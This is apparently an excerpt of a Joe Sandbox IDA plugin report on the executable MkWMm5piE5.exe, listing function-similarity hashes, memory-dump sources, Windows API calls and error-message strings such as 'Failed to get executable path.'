                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3702945584-0
                                                                                                                                                                                                                                                                          • Opcode ID: d801a28a554c769664efa354ebfd0b80a1c2cf055cf85cf1a4ca3ea16c8f16bf
                                                                                                                                                                                                                                                                          • Instruction ID: 7cdb8a33a3d269715bbe60f1874e53ba319271d368e996bd85421c5622b0e593
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d801a28a554c769664efa354ebfd0b80a1c2cf055cf85cf1a4ca3ea16c8f16bf
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D4115C24A0E68342FB5CB72E9551239E5415F8C7B4FC44334E9BD467E6DE2CF44186A2
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Value
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3702945584-0
                                                                                                                                                                                                                                                                          • Opcode ID: 36aa701cef3ea20dd7a69930769d7f1501d8ca7b86b81db8ef8c0888a69bdcaf
                                                                                                                                                                                                                                                                          • Instruction ID: 8a966035e43b537d3cf4701457b495b4c0f8e1474328b55a50310d2f45b6cae2
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 36aa701cef3ea20dd7a69930769d7f1501d8ca7b86b81db8ef8c0888a69bdcaf
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6F11D628F0A24742FB6C763A581157991425F8D378FD45738D9BE4A2F6DD2CB40146A3
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                          • String ID: verbose
                                                                                                                                                                                                                                                                          • API String ID: 3215553584-579935070
                                                                                                                                                                                                                                                                          • Opcode ID: ad3fface7d4b2ce3aa9510f497705372120eac90acd968bb25d3a192cbea6c12
                                                                                                                                                                                                                                                                          • Instruction ID: b95dfaeb003d19d3907fb0a805e74832f71019e9a753afaed1b53fcbaa8bb620
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ad3fface7d4b2ce3aa9510f497705372120eac90acd968bb25d3a192cbea6c12
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3D91D232E0864741E728AE29D85037DB7A4AB49B54FC44136DAED467E9DE3CE84183E2
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                          • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                                                                          • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                                                                          • Opcode ID: 1a54e2a2b62d6839c513ace75884cea9e48035532f3c44be9a18c4b4dcf643eb
                                                                                                                                                                                                                                                                          • Instruction ID: 99ed7a3c860532f34d362b4bc69cff158f36fef1fc3d2a223e39db2bf4d7e51f
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1a54e2a2b62d6839c513ace75884cea9e48035532f3c44be9a18c4b4dcf643eb
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C581B471D0820385F76C7FAD9152278B6A0AB11B84FD58035CA29672F5DB2DE901DBE3
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                                                          • String ID: MOC$RCC
                                                                                                                                                                                                                                                                          • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                                                          • Opcode ID: 37ce56c1d967fba8f41503b71a699ba51a6fbc199d8f022e66d4a2d7a57293db
                                                                                                                                                                                                                                                                          • Instruction ID: 141de2ad1aed6e227e1ab81e70ed11bd1d974210206aea1f591c5295ad5707bc
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 37ce56c1d967fba8f41503b71a699ba51a6fbc199d8f022e66d4a2d7a57293db
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 73618C72A08B468AE7189F69D4403EDB7A0FB48B88F445235EF5D13BA4DF38E145C791
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                                                          • String ID: csm$csm
                                                                                                                                                                                                                                                                          • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                                                          • Opcode ID: 80d5d2ed719ea387a00afc8e5c38e85421d4b0de11d669121429011e6c75d481
                                                                                                                                                                                                                                                                          • Instruction ID: ff6d756294b070421ef8e97a3eb6c9b06b0e3046e782853b59913a26932335fd
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 80d5d2ed719ea387a00afc8e5c38e85421d4b0de11d669121429011e6c75d481
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7F51C4B251864386EB68AF19D0443A8BBA0FB44B84F944135DBAC47BE5CF3CE855C7D2
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                                                                                          • String ID: %s%s: %s$Fatal error detected
                                                                                                                                                                                                                                                                          • API String ID: 1878133881-2410924014
                                                                                                                                                                                                                                                                          • Opcode ID: e8e3c511841a02337865787422672dc7088828a74b651abb3bad42d47e8d3758
                                                                                                                                                                                                                                                                          • Instruction ID: cf87a4091d7a444c3089415a1f477b9f7444c84b81b98ddd04ee82b53e459dbf
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e8e3c511841a02337865787422672dc7088828a74b651abb3bad42d47e8d3758
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4F31637262868781E728BB14E4516EAA364FF84784FC04135E69D47AE9CF3CD205CB91
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(?,00007FF7FBDC39EA), ref: 00007FF7FBDC3EF1
                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF7FBDC29E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF7FBDC87F2,?,?,?,?,?,?,?,?,?,?,?,00007FF7FBDC101D), ref: 00007FF7FBDC2A14
                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF7FBDC29E0: MessageBoxW.USER32 ref: 00007FF7FBDC2AF0
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorFileLastMessageModuleName
                                                                                                                                                                                                                                                                          • String ID: Failed to convert executable path to UTF-8.$Failed to get executable path.$GetModuleFileNameW
                                                                                                                                                                                                                                                                          • API String ID: 2581892565-1977442011
                                                                                                                                                                                                                                                                          • Opcode ID: 227eff0bc0a0d80c8f8e7ebb06cca3199172163df290dc8daf9e61b6ec9130a6
                                                                                                                                                                                                                                                                          • Instruction ID: 5d792b67a74295ff757e07a837b589edf927eef3c809bebcef34ca0b1f62f6f8
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 227eff0bc0a0d80c8f8e7ebb06cca3199172163df290dc8daf9e61b6ec9130a6
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 520175A1B2E64740FB6CB728D8557B59361AF487C4FC00431D86D866F6EE2CF20587E2
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2718003287-0
                                                                                                                                                                                                                                                                          • Opcode ID: 9513e67bca3e1584d4e6c680d6c879e0cc2bad3dff94493eb0c92e1d92f8606a
                                                                                                                                                                                                                                                                          • Instruction ID: 076e5a7e4b555b13073be93017b7e0df6a3772c6284011ae9497fbe0c9713d30
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9513e67bca3e1584d4e6c680d6c879e0cc2bad3dff94493eb0c92e1d92f8606a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 54D10172B19A4289E714DB78C4402ACB771EB487D8F844235CEAD97BE9DA38D407C391
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1956198572-0
                                                                                                                                                                                                                                                                          • Opcode ID: ecac84c754e5eddc26d74cef75c58701df5fcac281216c238072f9f7c8686c02
                                                                                                                                                                                                                                                                          • Instruction ID: 23a7f5d4a7840990d48647affdbf16d73b76edfea797d0ee8f26f030998407b7
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ecac84c754e5eddc26d74cef75c58701df5fcac281216c238072f9f7c8686c02
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1B11E961E0894382F75CB7ADF5852B9D291FF84B80FC48034EA6906BEDCD3CE4C14692
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                          • String ID: ?
                                                                                                                                                                                                                                                                          • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                                                                          • Opcode ID: 17ef38b8e319b62c4683ba5c2bd00e0c19603a4e78082bfdfdcdf9d98f8fed33
                                                                                                                                                                                                                                                                          • Instruction ID: f3cbcaacdf47c1f15eb941552f74abecfb991bee9749c3ac271d53d4de0ec650
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 17ef38b8e319b62c4683ba5c2bd00e0c19603a4e78082bfdfdcdf9d98f8fed33
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 21412812B0868342FB2CABA9D84137AD650EB807A4F944235EEBC06AF5DE3CD441C753
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7FBDD95D6
                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF7FBDDAF0C: RtlFreeHeap.NTDLL(?,?,?,00007FF7FBDE3392,?,?,?,00007FF7FBDE33CF,?,?,00000000,00007FF7FBDE3895,?,?,00000000,00007FF7FBDE37C7), ref: 00007FF7FBDDAF22
                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF7FBDDAF0C: GetLastError.KERNEL32(?,?,?,00007FF7FBDE3392,?,?,?,00007FF7FBDE33CF,?,?,00000000,00007FF7FBDE3895,?,?,00000000,00007FF7FBDE37C7), ref: 00007FF7FBDDAF2C
                                                                                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF7FBDCBFE5), ref: 00007FF7FBDD95F4
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                          • String ID: C:\Users\user\Desktop\MkWMm5piE5.exe
                                                                                                                                                                                                                                                                          • API String ID: 3580290477-925647190
                                                                                                                                                                                                                                                                          • Opcode ID: 72bea691884ec75b0bcc04dadd89fc5e2ba2839e886db2c4c4036b89f533388c
                                                                                                                                                                                                                                                                          • Instruction ID: fc3cd7530f1523798853edeada8f1f27d49a7870464e1610e960e34ba2f36d27
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 72bea691884ec75b0bcc04dadd89fc5e2ba2839e886db2c4c4036b89f533388c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DF418331A09B1385E75CFF29D4401B8A795EB887C4BD44035E99E43BE5DE3DE44183A1
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                                          • String ID: U
                                                                                                                                                                                                                                                                          • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                                                          • Opcode ID: c155d3c2efe6fcc9017d536d5590e74356888db1e245345eaaebbd58f2ba0871
